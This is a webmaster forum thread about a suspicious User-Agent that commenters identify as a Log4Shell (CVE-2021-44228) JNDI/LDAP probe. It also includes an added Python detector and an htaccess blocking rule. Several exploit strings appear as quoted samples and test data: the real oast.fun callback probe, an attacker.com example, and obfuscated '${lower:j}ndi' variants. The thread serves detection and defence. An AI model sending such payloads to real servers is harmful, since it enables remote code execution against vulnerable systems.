A new UA string?

At least to me it's new

mcneely

9:36 pm on Sep 20, 2025 (gmt 0)

Found this today in the UA list and I've been trying to track it down

UA: ${jndi:ldap://${:-935}${:-699}.${hostName}.useragent.d338jcn0129lesrb7s0grurjrymqwzg7d.oast.fun}

I get a lot of bots that don't particularly care to leave any strings at all. Eventually I discover their ranges and go from there.

AI maybe? Don't know -- If this thing is nefarious, I'm stumped on how I would write it out in htaccess

Near as I can tell it's a GitHub (interactsh) project. Don't know who's using it, though, and for what purpose.

SumGuy

2:51 am on Sep 22, 2025 (gmt 0)

I'm going to throw this out there: this is the Apache Log4j vulnerability (CVE-2021-44228).

--------------
Considering the log content is usually exposed to users and can be easily controlled by the attacker in many applications, once the attacker controls the string as shown in Figure 3 and sets a malicious Java class on an attacker-controlled LDAP server, the lookup method will be used to execute the malicious Java class on the remote LDAP server.

Example of a Malicious JNDI lookup string with LDAP, shown for the purpose of explaining CVE-2021-44228

jndi:ldap://www.attacker.com/malicious_java_class
-------------

The domain oast.fun actually resolves to 206.189.156.69 - that's a DigitalOcean IP.

What IPs were you getting this from?
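The string in the opening post is deliberately hard to grep for. In Log4j 2's lookup syntax `${key:-default}` yields the default when the key is unknown, so `${:-935}${:-699}` collapses to `935699` (a tag for the callback), `${hostName}` is filled in by the victim with its own hostname, and the whole thing becomes a DNS or LDAP callback to the interactsh server under oast.fun. Scanners also write `${${lower:j}ndi:...}` or `${${::-j}ndi:...}` to slip past filters that look for the literal `${jndi:`. The following is an added example of my own, not code from this thread, Log4j or interactsh: it re-implements just those three lookup rules (`:-` defaults, `lower:`, `upper:`) as an assumption about how the obfuscation resolves, expands nested lookups innermost-first, and then pulls the scheme and callback host out of access-log lines. The sample log lines are constructed; only the first carries the UA quoted in the thread.

```python
"""Spot CVE-2021-44228 (Log4Shell) probes in access-log lines, including the
obfuscated forms a plain grep for '${jndi:' misses. Added example for this
thread, not code from the forum, Log4j or interactsh; it assumes the
obfuscation relies on Log4j 2's own ${key:-default}, ${lower:x} and
${upper:x} lookup rules, re-implemented here only as far as needed. The
log lines in SAMPLE_LOG are constructed (line 1 carries the UA from the thread).
"""
import re
from dataclasses import dataclass
from typing import List, Optional
from urllib.parse import unquote

def _find_close(s: str, start: int) -> int:
    """Index of the '}' matching the '${' that ends at start; len(s) if unterminated."""
    depth, i = 1, start
    while i < len(s):
        if s.startswith("${", i):
            depth, i = depth + 1, i + 2
            continue
        if s[i] == "}":
            depth -= 1
            if depth == 0:
                return i
        i += 1
    return len(s)

def _resolve(inner: str) -> str:
    """Evaluate one lookup body the way Log4j 2 does when the key is unknown."""
    low = inner.lower()
    if low.startswith("lower:"):
        return inner[6:].lower()
    if low.startswith("upper:"):
        return inner[6:].upper()
    if ":-" in inner:
        # ${key:-default}: for ${:-935} and ${::-j} no such key exists, so the
        # default text ("935", "j") is what ends up in the string.
        return inner.split(":-", 1)[1]
    return "${" + inner + "}"  # ${hostName}, ${env:..}, ${jndi:..}: keep visible

def expand_lookups(s: str) -> str:
    """Expand nested ${...} lookups innermost-first in one pass."""
    out: List[str] = []
    i = 0
    while i < len(s):
        if s.startswith("${", i):
            close = _find_close(s, i + 2)
            out.append(_resolve(expand_lookups(s[i + 2:close])))
            i = close + 1
        else:
            out.append(s[i])
            i += 1
    return "".join(out)

# Expanded probe: ${jndi:<scheme>://<host>...}; host may keep a ${hostName} marker.
_JNDI = re.compile(
    r"\$\{jndi:(?P<scheme>[a-z]+):/*(?P<host>(?:\$\{[^{}]*\}|[^/:\s{}])+)[^{}\s]*\}?",
    re.IGNORECASE,
)

@dataclass
class Probe:
    client_ip: str
    scheme: str         # ldap, rmi, dns, ...
    callback_host: str  # where the victim is told to connect or resolve
    payload: str        # the de-obfuscated lookup

def _decode(line: str) -> str:
    """Undo the encodings that hide '${' in logs: Apache's \\xHH and URL %HH."""
    line = re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), line)
    return unquote(line)

def callback_domain(host: str) -> str:
    """Last two labels of the callback host, ${...} markers dropped."""
    labels = [lb for lb in re.sub(r"\$\{[^{}]*\}", "", host).split(".") if lb]
    return ".".join(labels[-2:])

def scan_line(line: str) -> Optional[Probe]:
    """Scan one combined-format line; path, referer and UA are all checked."""
    m = _JNDI.search(expand_lookups(_decode(line)))
    if m is None:
        return None
    return Probe(line.split(" ", 1)[0], m.group("scheme").lower(),
                 m.group("host"), m.group(0))

def scan_log(text: str) -> List[Probe]:
    found = (scan_line(ln) for ln in text.splitlines() if ln.strip())
    return [p for p in found if p is not None]

SAMPLE_LOG = r'''
134.122.5.63 - - [20/Sep/2025:21:01:12 +0000] "GET / HTTP/1.1" 200 5123 "-" "${jndi:ldap://${:-935}${:-699}.${hostName}.useragent.d338jcn0129lesrb7s0grurjrymqwzg7d.oast.fun}"
203.0.113.7 - - [20/Sep/2025:21:02:30 +0000] "GET /?x=%24%7B${lower:j}ndi:${lower:l}dap://203.0.113.7:1389/a%7D HTTP/1.1" 400 0 "-" "curl/8.4.0"
198.51.100.9 - - [20/Sep/2025:21:03:45 +0000] "GET /login HTTP/1.1" 200 812 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://198.51.100.9/x}"
192.0.2.44 - - [20/Sep/2025:21:04:01 +0000] "GET /robots.txt HTTP/1.1" 200 68 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"
'''
```

Running `scan_log(SAMPLE_LOG)` reports the first three lines as probes (ldap, ldap, rmi) and `callback_domain` on the first gives `oast.fun`; the Firefox line is clean. Two practical notes. First, for the htaccess question in the opening post: because the scanner can hide `jndi` behind nested lookups, a rule that keys on the literal `${jndi:` is not enough; the blunt but reliable Apache rule is to refuse any User-Agent containing `${` at all (`RewriteCond %{HTTP_USER_AGENT} \$\{ [NC]` followed by `RewriteRule .* - [F]`), since no legitimate browser sends that sequence. Second, a web server that merely logs the string is not vulnerable; the probe only fires if something downstream (a Java application, a log shipper, a WAF) runs an unpatched Log4j 2 over that field, so the signal worth alerting on is an outbound DNS or LDAP lookup from your own hosts for a name under the callback domain.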

lucy24

4:05 pm on Sep 22, 2025 (gmt 0)

UA: ${jndi:ldap://${:-935}${:-699}.${hostName}.useragent.d338jcn0129lesrb7s0grurjrymqwzg7d.oast.fun}
I haven't seen that specific format, but I do occasionally get UAs that clearly originated with a fill-in-the-blank template, and the inept botrunner neglected to fill in the blank. Closely analogous to saying out loud “I comma your name comma swear slash affirm” and so on.

Brett_Tabke

4:08 pm on Sep 22, 2025 (gmt 0)

Here is the best answer out there:

[security.stackexchange.com...]

mcneely

12:16 am on Sep 24, 2025 (gmt 0)

Originated from 134.122.5.63.

ns1.oast.fun resolves to a page that refers you to a GitHub project. (I'm guessing a snooper utility of some sort.)

Thanks for the link Brett - tons of good stuff there

tangor

4:59 am on Sep 24, 2025 (gmt 0)

...and the inept botrunner neglected to fill in the blank.

Thank goodness there are more sloppy joes like that than the clever ones!